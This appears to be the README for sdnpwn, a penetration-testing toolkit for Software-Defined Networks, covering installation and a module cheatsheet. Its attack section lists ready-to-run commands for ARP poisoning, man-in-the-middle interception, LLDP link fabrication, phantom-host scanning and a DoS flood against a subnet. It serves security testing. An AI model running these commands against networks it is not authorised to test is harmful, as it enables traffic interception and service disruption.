sdnpwn v1.7.0 releases: An SDN penetration testing toolkit

sdnpwn is a toolkit and framework for testing the security of Software-Defined Networks (SDNs). For more information check out this article.

Installation
First download sdnpwn using git

git clone https://github.com/smythtech/sdnpwn

Make the sdnpwn.py and setup.sh scripts executable

sudo chmod +x sdnpwn.py
sudo chmod +x setup.sh

The setup.sh script takes care installing the software required for sdnpwn to function. Just run ./setup.sh and follow the instructions.

sudo ./setup.sh

Usage

Cheatsheet

Functionality in sdnpwn is divided into different modules. Each attack or attack type is available from a certain module.

Modules can be executed like so:

./sdnpwn.py <module name> <module options>

The mods module can be used to list all available modules:

./sdnpwn.py mods

More information about a certain module can be accessed using the info module:

./sdnpwn.py info mods

The above command would retrieve more information about the mods module, such as a description and available options.

Reconnaissance
arpmon

./sdnpwn.py arpmon -i eth0 -m watch #Dump information from ARP traffic seen at interface eth0
./sdnpwn.py arpmon -i eth0 -m map #Map MAC addresses to IP addresses

sdn-detect

./sdnpwn.py sdn-detect #Test using default gateway with ARP traffic
./sdnpwn.py sdn-detect -t 192.168.0.29 -m icmp #Test using host 192.168.0.29 using ICMP traffic
./sdnpwn.py sdn-detect -c 100 -v #Test using 100 ARP messages. Print additional output.

controller-detect

./sdnpwn.py controller-detect -i eth0 –lldp #Test usign observed LLDP messages at interface eth0
./sdnpwn.py controller-detect -t 192.168.0.3 #Test NB Inter. of controller at 192.168.0.3

Management
help

./sdnpwn.py help #Print sdnpwn help

mods

./sdnpwn.py mods #Print a list of all executable modules
./sdnpwn.py mods -s lfa #Search modules for a module with “lfa” in it’s name
./sdnpwn.py mods -n new-mod #Create a new module named “new-mod”
./sdnpwn.py mods -r new-mod #Remove module named “new-mod”

info

./sdnpwn.py info test-mod #Print information for module named “test-mod”

system

./sdnpwn.py system ifconfig #Run ifconfig command on the system

Attack

lfa-relay

./sdnpwn.py lfa-relay –iface1 eth0 –iface2 eth1 –relay bridge #Relay LLDP frames between eth0 and eth1
./sdnpwn.py lfa-relay –iface1 eth0 –iface2 eth1 –relay tunnel \
–tunnel-local 192.168.70.1 –tunnel-remote 192.168.70.2 #Relay LLDP frames through a remote tunnel

lfa-scapy

./sdnpwn.py lfa-scapy –iface1 eth0 –iface2 eth1 #Relay LLDP frames between eth0 and eth1
./sdnpwn.py lfa-scapy –iface1 eth0 –iface2 eth1 –script mitm.py #Pass relayed traffic through a custom script

dp-arp-poison

./sdnpwn.py dp-arp-poison -i eth0 -v 192.168.1.2 -t 192.168.1.3 -m de:ad:be:ef:ba:11 #Poison 192.168.1.3 in ARP cache of 192.168.1.2 with MAC of de:ad:be:ef:ba:11

dp-mitm

./sdnpwn.py dp-mitm –iface eth0 –target1 192.168.1.2 –gateway #MITM connection from target to gateway

phantom-host-scan

./sdnpwn.py phantom-host-scan –iface eth0 –target-ip 192.168.1.2 –ports 22,23 –phantom-ip 192.168.1.5 #Scan ports 22 and 23 using the phantom host scan

phantom-storm

./sdnpwn.py phantom-storm –iface eth0 –target 192.168.1.0/24 –phantom-ip 192.168.1.5 –packets 1000 #Launch phantom storm DoS attack against network 192.168.1.0/24 with 1000 packets

Further Information
Check out https://sdnpwn.net for articles and tutorials on using various sdnpwn modules and the attacks they use.

Disclaimer
This tool comes without warranty. The developers of this tool decline all responsibility for malicious or illegal use, and the impact caused by malicious or illegal use.

Copyright (c) 2017 Dylan Smyth
Source: https://github.com/smythtech/